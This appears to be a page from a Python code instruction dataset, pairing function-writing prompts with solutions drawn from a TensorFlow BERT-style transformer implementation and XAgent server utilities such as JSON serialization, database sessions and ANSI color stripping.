  """Layer-normalize `input_tensor` over its last dimension."""
  return contrib_layers.layer_norm(
      inputs=input_tensor, begin_norm_axis=-1, begin_params_axis=-1,
      scope=name)
def create_initializer(initializer_range=0.02):
  """Build a truncated-normal initializer whose stddev is the given range."""
  return tf.truncated_normal_initializer(stddev=initializer_range)
def attention_layer(from_tensor,
                    to_tensor,
                    attention_mask=None,
                    num_attention_heads=1,
                    size_per_head=512,
                    query_act=None,
                    key_act=None,
                    value_act=None,
                    attention_probs_dropout_prob=0.0,
                    initializer_range=0.02,
                    do_return_2d_tensor=False,
                    batch_size=None,
                    from_seq_length=None,
                    to_seq_length=None):
  """Performs multi-headed attention from `from_tensor` to `to_tensor`.

  This is an implementation of multi-headed attention based on "Attention
  is all you Need". If `from_tensor` and `to_tensor` are the same, then
  this is self-attention. Each timestep in `from_tensor` attends to the
  corresponding sequence in `to_tensor`, and returns a fixed-width vector.

  This function first projects `from_tensor` into a "query" tensor and
  `to_tensor` into "key" and "value" tensors. These are (effectively) a list
  of tensors of length `num_attention_heads`, where each tensor is of shape
  [batch_size, seq_length, size_per_head].

  Then, the query and key tensors are dot-producted and scaled. These are
  softmaxed to obtain attention probabilities. The value tensors are then
  interpolated by these probabilities, then concatenated back to a single
  tensor and returned.

  In practice, the multi-headed attention are done with transposes and
  reshapes rather than actual separate tensors.

  Args:
    from_tensor: float Tensor of shape [batch_size, from_seq_length,
      from_width].
    to_tensor: float Tensor of shape [batch_size, to_seq_length, to_width].
    attention_mask: (optional) int32 Tensor of shape [batch_size,
      from_seq_length, to_seq_length]. The values should be 1 or 0. The
      attention scores will effectively be set to -infinity for any positions in
      the mask that are 0, and will be unchanged for positions that are 1.
    num_attention_heads: int. Number of attention heads.
    size_per_head: int. Size of each attention head.
    query_act: (optional) Activation function for the query transform.
    key_act: (optional) Activation function for the key transform.
    value_act: (optional) Activation function for the value transform.
    attention_probs_dropout_prob: (optional) float. Dropout probability of the
      attention probabilities.
    initializer_range: float. Range of the weight initializer.
    do_return_2d_tensor: bool. If True, the output will be of shape [batch_size
      * from_seq_length, num_attention_heads * size_per_head]. If False, the
      output will be of shape [batch_size, from_seq_length, num_attention_heads
      * size_per_head].
    batch_size: (Optional) int. If the input is 2D, this might be the batch size
      of the 3D version of the `from_tensor` and `to_tensor`.
    from_seq_length: (Optional) If the input is 2D, this might be the seq length
      of the 3D version of the `from_tensor`.
    to_seq_length: (Optional) If the input is 2D, this might be the seq length
      of the 3D version of the `to_tensor`.

  Returns:
    A (context_layer, attention_probs) pair. `context_layer` is a float
    Tensor of shape [batch_size, from_seq_length,
    num_attention_heads * size_per_head] (or, if `do_return_2d_tensor` is
    true, of shape [batch_size * from_seq_length,
    num_attention_heads * size_per_head]); `attention_probs` is the
    post-softmax attention tensor of shape [batch_size,
    num_attention_heads, from_seq_length, to_seq_length].

  Raises:
    ValueError: Any of the arguments or tensor shapes are invalid.
  """

  def transpose_for_scores(input_tensor, batch_size, num_attention_heads,
                           seq_length, width):
    # [B, S, N*H] (flattened) -> [B, N, S, H] so heads become a batch dim.
    output_tensor = tf.reshape(
        input_tensor, [batch_size, seq_length, num_attention_heads, width])

    output_tensor = tf.transpose(output_tensor, [0, 2, 1, 3])
    return output_tensor

  from_shape = get_shape_list(from_tensor, expected_rank=[2, 3])
  to_shape = get_shape_list(to_tensor, expected_rank=[2, 3])

  if len(from_shape) != len(to_shape):
    raise ValueError(
        "The rank of `from_tensor` must match the rank of `to_tensor`.")

  if len(from_shape) == 3:
    batch_size = from_shape[0]
    from_seq_length = from_shape[1]
    to_seq_length = to_shape[1]
  elif len(from_shape) == 2:
    if batch_size is None or from_seq_length is None or to_seq_length is None:
      raise ValueError(
          "When passing in rank 2 tensors to attention_layer, the values "
          "for `batch_size`, `from_seq_length`, and `to_seq_length` "
          "must all be specified.")

  # Scalar dimensions referenced here:
  #   B = batch size (number of sequences)
  #   F = `from_tensor` sequence length
  #   T = `to_tensor` sequence length
  #   N = `num_attention_heads`
  #   H = `size_per_head`

  from_tensor_2d = reshape_to_matrix(from_tensor)
  to_tensor_2d = reshape_to_matrix(to_tensor)

  # `query_layer` = [B*F, N*H]
  query_layer = tf.layers.dense(
      from_tensor_2d,
      num_attention_heads * size_per_head,
      activation=query_act,
      name="query",
      kernel_initializer=create_initializer(initializer_range))

  # `key_layer` = [B*T, N*H]
  key_layer = tf.layers.dense(
      to_tensor_2d,
      num_attention_heads * size_per_head,
      activation=key_act,
      name="key",
      kernel_initializer=create_initializer(initializer_range))

  # `value_layer` = [B*T, N*H]
  value_layer = tf.layers.dense(
      to_tensor_2d,
      num_attention_heads * size_per_head,
      activation=value_act,
      name="value",
      kernel_initializer=create_initializer(initializer_range))

  # `query_layer` = [B, N, F, H]
  query_layer = transpose_for_scores(query_layer, batch_size,
                                     num_attention_heads, from_seq_length,
                                     size_per_head)

  # `key_layer` = [B, N, T, H]
  key_layer = transpose_for_scores(key_layer, batch_size, num_attention_heads,
                                   to_seq_length, size_per_head)

  # Take the dot product between "query" and "key" to get the raw
  # attention scores, scaled by 1/sqrt(H) as in the Transformer paper.
  # `attention_scores` = [B, N, F, T]
  attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
  attention_scores = tf.multiply(attention_scores,
                                 1.0 / math.sqrt(float(size_per_head)))

  if attention_mask is not None:
    # `attention_mask` = [B, 1, F, T]
    attention_mask = tf.expand_dims(attention_mask, axis=[1])

    # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
    # masked positions, this operation will create a tensor which is 0.0 for
    # positions we want to attend and -10000.0 for masked positions.
    adder = (1.0 - tf.cast(attention_mask, tf.float32)) * -10000.0

    # Since we are adding it to the raw scores before the softmax, this is
    # effectively the same as removing these entirely.
    attention_scores += adder

  # Normalize the attention scores to probabilities.
  # `attention_probs` = [B, N, F, T]
  attention_probs = tf.nn.softmax(attention_scores)

  # This is actually dropping out entire tokens to attend to, which might
  # seem a bit unusual, but is taken from the original Transformer paper.
  attention_probs = dropout(attention_probs, attention_probs_dropout_prob)

  # `value_layer` = [B, T, N, H]
  value_layer = tf.reshape(
      value_layer,
      [batch_size, to_seq_length, num_attention_heads, size_per_head])

  # `value_layer` = [B, N, T, H]
  value_layer = tf.transpose(value_layer, [0, 2, 1, 3])

  # Weighted sum of values by attention probabilities.
  # `context_layer` = [B, N, F, H]
  context_layer = tf.matmul(attention_probs, value_layer)

  # `context_layer` = [B, F, N, H]
  context_layer = tf.transpose(context_layer, [0, 2, 1, 3])

  if do_return_2d_tensor:
    # `context_layer` = [B*F, N*H]
    context_layer = tf.reshape(
        context_layer,
        [batch_size * from_seq_length, num_attention_heads * size_per_head])
  else:
    # `context_layer` = [B, F, N*H]
    context_layer = tf.reshape(
        context_layer,
        [batch_size, from_seq_length, num_attention_heads * size_per_head])

  # NOTE: unlike stock BERT, this variant also returns the attention
  # probabilities alongside the context tensor.
  return context_layer, attention_probs
def get_shape_list(tensor, expected_rank=None, name=None):
  """Returns a list of the shape of tensor, preferring static dimensions.

  Args:
    tensor: A tf.Tensor object (or numpy array / list) to find the shape of.
    expected_rank: (optional) int. The expected rank of `tensor`. If this is
      specified and the `tensor` has a different rank, an exception will be
      thrown.
    name: Optional name of the tensor for the error message.

  Returns:
    A list of dimensions of the shape of tensor. All static dimensions will
    be returned as python integers, and dynamic dimensions will be returned
    as tf.Tensor scalars.
  """
  # numpy arrays and plain lists have fully static shapes; validate the
  # rank directly and return the numpy shape tuple.
  if isinstance(tensor, np.ndarray) or isinstance(tensor, list):
    shape = np.array(tensor).shape
    if isinstance(expected_rank, six.integer_types):
      assert len(shape) == expected_rank
    elif expected_rank is not None:
      # Non-int expected_rank is treated as a collection of allowed ranks.
      assert len(shape) in expected_rank
    return shape

  if name is None:
    name = tensor.name

  if expected_rank is not None:
    # assert_rank is defined elsewhere in this module.
    assert_rank(tensor, expected_rank, name)

  shape = tensor.shape.as_list()

  # Collect the axes whose static size is unknown at graph-build time.
  non_static_indexes = []
  for (index, dim) in enumerate(shape):
    if dim is None:
      non_static_indexes.append(index)

  # Fast path: the shape is fully static.
  if not non_static_indexes:
    return shape

  # Fall back to dynamic shape scalars only for the unknown axes.
  dyn_shape = tf.shape(tensor)
  for index in non_static_indexes:
    shape[index] = dyn_shape[index]
  return shape
def reshape_to_matrix(input_tensor):
  """Reshapes a >= rank 2 tensor to a rank 2 tensor (i.e., a matrix)."""
  ndims = input_tensor.shape.ndims
  if ndims < 2:
    raise ValueError("Input tensor must have at least rank 2. Shape = %s" %
                     (input_tensor.shape))
  if ndims == 2:
    return input_tensor

  # Collapse every leading axis into one, keeping the trailing width.
  width = input_tensor.shape[-1]
  return tf.reshape(input_tensor, [-1, width])
def reshape_from_matrix(output_tensor, orig_shape_list):
  """Reshapes a rank 2 tensor back to its original rank >= 2 tensor."""
  if len(orig_shape_list) == 2:
    return output_tensor

  # Restore the original leading dims; keep the matrix's *current* trailing
  # width, which may differ from the original last dimension.
  width = get_shape_list(output_tensor)[-1]
  return tf.reshape(output_tensor, orig_shape_list[0:-1] + [width])
The provided code snippet includes necessary dependencies for implementing the `transformer_model` function. Write a Python function `def transformer_model(input_tensor, attention_mask=None, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072, intermediate_act_fn=gelu, hidden_dropout_prob=0.1, attention_probs_dropout_prob=0.1, initializer_range=0.02, do_return_all_layers=False)` to solve the following problem:
Multi-headed, multi-layer Transformer from "Attention is All You Need". This is almost an exact implementation of the original Transformer encoder. See the original paper: https://arxiv.org/abs/1706.03762 Also see: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py Args: input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size]. attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length, seq_length], with 1 for positions that can be attended to and 0 in positions that should not be. hidden_size: int. Hidden size of the Transformer. num_hidden_layers: int. Number of layers (blocks) in the Transformer. num_attention_heads: int. Number of attention heads in the Transformer. intermediate_size: int. The size of the "intermediate" (a.k.a., feed forward) layer. intermediate_act_fn: function. The non-linear activation function to apply to the output of the intermediate/feed-forward layer. hidden_dropout_prob: float. Dropout probability for the hidden layers. attention_probs_dropout_prob: float. Dropout probability of the attention probabilities. initializer_range: float. Range of the initializer (stddev of truncated normal). do_return_all_layers: Whether to also return all layers or just the final layer. Returns: float Tensor of shape [batch_size, seq_length, hidden_size], the final hidden layer of the Transformer. Raises: ValueError: A Tensor shape or parameter is invalid.
Here is the function:
def transformer_model(input_tensor,
                      attention_mask=None,
                      hidden_size=768,
                      num_hidden_layers=12,
                      num_attention_heads=12,
                      intermediate_size=3072,
                      intermediate_act_fn=gelu,
                      hidden_dropout_prob=0.1,
                      attention_probs_dropout_prob=0.1,
                      initializer_range=0.02,
                      do_return_all_layers=False):
    """Multi-headed, multi-layer Transformer from "Attention is All You Need".

    A close implementation of the original Transformer encoder
    (https://arxiv.org/abs/1706.03762); see also tensor2tensor's
    transformer.py.

    Args:
      input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size].
      attention_mask: (optional) int32 Tensor of shape
        [batch_size, seq_length, seq_length]; 1 marks positions that may be
        attended to, 0 marks positions that must not be.
      hidden_size: int. Hidden size of the Transformer.
      num_hidden_layers: int. Number of layers (blocks) in the Transformer.
      num_attention_heads: int. Number of attention heads.
      intermediate_size: int. Size of the "intermediate" (feed-forward) layer.
      intermediate_act_fn: function. Non-linearity applied to the output of
        the intermediate/feed-forward layer.
      hidden_dropout_prob: float. Dropout probability for the hidden layers.
      attention_probs_dropout_prob: float. Dropout probability of the
        attention probabilities.
      initializer_range: float. Stddev of the truncated-normal initializer.
      do_return_all_layers: Whether to also return all layers or just the
        final layer.

    Returns:
      A (hidden_output, attention_maps) tuple. hidden_output is a float
      Tensor of shape [batch_size, seq_length, hidden_size] (the final
      layer), or a stack over all layers when do_return_all_layers is True.

    Raises:
      ValueError: A Tensor shape or parameter is invalid.
    """
    if hidden_size % num_attention_heads != 0:
        raise ValueError(
            "The hidden size (%d) is not a multiple of the number of attention "
            "heads (%d)" % (hidden_size, num_attention_heads))
    size_per_head = hidden_size // num_attention_heads

    input_shape = get_shape_list(input_tensor, expected_rank=3)
    batch_size, seq_length, input_width = input_shape

    # The residual connections require the input width to equal hidden_size.
    if input_width != hidden_size:
        raise ValueError("The width of the input tensor (%d) != hidden size (%d)" %
                         (input_width, hidden_size))

    # Keep activations as a 2D [batch*seq, hidden] matrix between layers:
    # re-shapes are normally free on GPU/CPU but may not be on TPU.
    hidden_2d = reshape_to_matrix(input_tensor)

    attn_maps = []
    all_layer_outputs = []
    for layer_idx in range(num_hidden_layers):
        with tf.variable_scope("layer_%d" % layer_idx):
            with tf.variable_scope("attention"):
                with tf.variable_scope("self"):
                    self_attn_output, probs = attention_layer(
                        from_tensor=hidden_2d,
                        to_tensor=hidden_2d,
                        attention_mask=attention_mask,
                        num_attention_heads=num_attention_heads,
                        size_per_head=size_per_head,
                        attention_probs_dropout_prob=attention_probs_dropout_prob,
                        initializer_range=initializer_range,
                        do_return_2d_tensor=True,
                        batch_size=batch_size,
                        from_seq_length=seq_length,
                        to_seq_length=seq_length)
                attn_maps.append(probs)

                # Linear projection back to `hidden_size`, then residual +
                # layer norm against the layer's input.
                with tf.variable_scope("output"):
                    attention_output = tf.layers.dense(
                        self_attn_output,
                        hidden_size,
                        kernel_initializer=create_initializer(initializer_range))
                    attention_output = dropout(attention_output,
                                               hidden_dropout_prob)
                    attention_output = layer_norm(attention_output + hidden_2d)

            # Position-wise feed-forward; the activation is only applied to
            # the "intermediate" hidden layer.
            with tf.variable_scope("intermediate"):
                intermediate_output = tf.layers.dense(
                    attention_output,
                    intermediate_size,
                    activation=intermediate_act_fn,
                    kernel_initializer=create_initializer(initializer_range))

            # Down-project back to `hidden_size`, then residual + layer norm.
            with tf.variable_scope("output"):
                hidden_2d = tf.layers.dense(
                    intermediate_output,
                    hidden_size,
                    kernel_initializer=create_initializer(initializer_range))
                hidden_2d = dropout(hidden_2d, hidden_dropout_prob)
                hidden_2d = layer_norm(hidden_2d + attention_output)
                all_layer_outputs.append(hidden_2d)

    attn_maps = tf.stack(attn_maps, 0)
    if do_return_all_layers:
        return tf.stack([reshape_from_matrix(layer, input_shape)
                         for layer in all_layer_outputs], 0), attn_maps
    return reshape_from_matrix(hidden_2d, input_shape), attn_maps
6,220 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import pickle
import sys
import tensorflow.compat.v1 as tf
def load_pickle(path):
    """Deserialize and return the pickled object stored at `path`.

    NOTE: pickle is only safe for trusted files.
    """
    handle = tf.io.gfile.GFile(path, "rb")
    try:
        return pickle.load(handle)
    finally:
        handle.close()
6,221 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import pickle
import sys
import tensorflow.compat.v1 as tf
The provided code snippet includes necessary dependencies for implementing the `nest_dict` function. Write a Python function `def nest_dict(d, prefixes, delim="_")` to solve the following problem:
Go from {prefix_key: value} to {prefix: {key: value}}.
Here is the function:
def nest_dict(d, prefixes, delim="_"):
    """Go from {prefix_key: value} to {prefix: {key: value}}.

    Args:
      d: flat dict whose keys may start with one of `prefixes` + `delim`.
      prefixes: iterable of prefix strings to nest under.
      delim: separator between a prefix and the remainder of the key.

    Returns:
      A new dict in which every key "prefix<delim>rest" is stored as
      nested[prefix][rest]; keys matching no prefix are copied through
      unchanged at the top level.
    """
    nested = {}
    for k, v in d.items():
        for prefix in prefixes:
            if k.startswith(prefix + delim):
                # Strip the prefix and file the entry under its own sub-dict.
                nested.setdefault(prefix, {})[k.split(delim, 1)[1]] = v
                break
        else:
            # Bug fix: the previous version executed this branch once per
            # NON-matching prefix, so with multiple prefixes a nested key was
            # also duplicated (un-stripped) at the top level.
            nested[k] = v
    return nested
6,222 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import re
import time
import tensorflow.compat.v1 as tf
from model import modeling
from util import utils
def secs_to_str(secs):
    """Render a duration in seconds as "H:MM:SS" with leading zero units trimmed."""
    text = str(datetime.timedelta(seconds=int(round(secs))))
    # Strip up to two leading "0:" / "0" pairs, so e.g. "0:00:05" -> "5"
    # and "0:01:05" -> "1:05".
    for _ in range(2):
        text = re.sub("^0:", "", text)
        text = re.sub("^0", "", text)
    return text
6,223 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import re
import time
import tensorflow.compat.v1 as tf
from model import modeling
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_bert_config` function. Write a Python function `def get_bert_config(config)` to solve the following problem:
Get model hyperparameters based on a pretraining/finetuning config
Here is the function:
def get_bert_config(config):
    """Build a modeling.BertConfig from a pretraining/finetuning config.

    Hidden size and depth follow config.model_size; vocab size and any
    explicit hyperparameter overrides are then layered on top.
    """
    size_presets = {
        "large": {"hidden_size": 1024, "num_hidden_layers": 24},
        "base": {"hidden_size": 768, "num_hidden_layers": 12},
        "small": {"hidden_size": 256, "num_hidden_layers": 12},
    }
    if config.model_size not in size_presets:
        raise ValueError("Unknown model size", config.model_size)
    args = dict(size_presets[config.model_size])
    args["vocab_size"] = config.vocab_size
    args.update(**config.model_hparam_overrides)
    # By default the ff size and num attn heads are derived from the hidden
    # size; the second update lets explicit overrides win over the derived
    # values as well.
    args["num_attention_heads"] = max(1, args["hidden_size"] // 64)
    args["intermediate_size"] = 4 * args["hidden_size"]
    args.update(**config.model_hparam_overrides)
    return modeling.BertConfig.from_dict(args)
6,224 | from contextlib import contextmanager
import datetime
import os
import time
import json
import re
from colorama import Fore
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig
from XAgentServer.database.connect import SessionLocal
from XAgentServer.loggers.logs import Logger
from XAgentServer.models.recorder import XAgentRunningRecord
from XAgentServer.application.cruds.recorder import RunningRecordCRUD
from XAgentServer.enums.recorder_type import RecorderTypeEnum
The provided code snippet includes necessary dependencies for implementing the `dump_common_things` function. Write a Python function `def dump_common_things(object)` to solve the following problem:
common
Here is the function:
def dump_common_things(object):
    """Recursively reduce *object* to JSON-serializable primitives.

    Primitives pass through unchanged, dicts and lists recurse, and objects
    exposing a callable ``to_json`` are converted via it; anything else
    yields None.
    """
    if type(object) in (str, int, float, bool):
        return object
    if isinstance(object, dict):
        return {dump_common_things(key): dump_common_things(val)
                for key, val in object.items()}
    if isinstance(object, list):
        return [dump_common_things(item) for item in object]
    to_json = getattr(object, 'to_json', None)
    return to_json() if callable(to_json) else None
6,225 | from contextlib import contextmanager
import datetime
import os
import time
import json
import re
from colorama import Fore
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig
from XAgentServer.database.connect import SessionLocal
from XAgentServer.loggers.logs import Logger
from XAgentServer.models.recorder import XAgentRunningRecord
from XAgentServer.application.cruds.recorder import RunningRecordCRUD
from XAgentServer.enums.recorder_type import RecorderTypeEnum
SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)
The provided code snippet includes necessary dependencies for implementing the `get_db` function. Write a Python function `def get_db()` to solve the following problem:
Provide a transactional scope around a series of operations.
Here is the function:
def get_db():
    """
    Provide a transactional scope around a series of operations.

    Generator dependency: yields a session created by SessionLocal (a
    sessionmaker factory), commits when the caller's work completes
    cleanly, rolls back and re-raises on any error, and always closes
    the session.
    """
    session = SessionLocal()
    try:
        yield session
        # Commit only after the caller's block finished without raising;
        # a failing commit is itself caught and rolled back below.
        session.commit()
    except:  # noqa: E722 -- intentionally broad: roll back on ANY exception before re-raising
        session.rollback()
        raise
    finally:
        session.close()
6,226 | import os
import time
import json
import yaml
import uuid
import logging
from copy import deepcopy
from colorama import Fore, Style
from XAgent.logs import logger
from XAgent.workflow.base_query import AutoGPTQuery
from XAgent.config import XAgentConfig, CONFIG
The provided code snippet includes necessary dependencies for implementing the `dump_common_things` function. Write a Python function `def dump_common_things(object)` to solve the following problem:
Serialize commonly used data types, like str, int, float, bool, dictionaries, and lists. Args: object (Any): The object to serialize. Returns: object: The cpickled object.
Here is the function:
def dump_common_things(object):
    """
    Serialize commonly used data types, like str, int, float, bool,
    dictionaries, and lists.

    Args:
        object (Any): The object to serialize.

    Returns:
        object: The serialized object, or None if the type is unsupported
        and exposes no callable `to_json`.
    """
    if type(object) in [str, int, float, bool]:
        return object
    # Use isinstance (consistent with the other dump_common_things variant)
    # so dict/list subclasses such as OrderedDict are serialized instead of
    # silently dropped to None by an exact-type check.
    if isinstance(object, dict):
        return {dump_common_things(key): dump_common_things(value) for key, value in object.items()}
    if isinstance(object, list):
        return [dump_common_things(cont) for cont in object]
    method = getattr(object, 'to_json', None)
    if callable(method):
        return method()
6,227 | import logging
import os
import random
import re
import time
import json
import abc
from logging import LogRecord
from typing import Any
import uuid
from threading import Lock
from colorama import Fore, Style
from XAgent.utils import Singleton, TaskSaveItem
def remove_color_codes(s: str) -> str:
    """Strip ANSI escape (color) sequences from *s*.

    Non-string inputs are first serialized to JSON; if that fails they are
    rendered with str().
    """
    if not isinstance(s, str):
        try:
            s = json.dumps(s)
        # Narrowed from a bare `except:` -- json.dumps raises TypeError (and
        # ValueError for e.g. circular refs); a bare except would also
        # swallow KeyboardInterrupt/SystemExit.
        except (TypeError, ValueError):
            s = str(s)
    ansi_escape = re.compile(r"\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])")
    return ansi_escape.sub("", s)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.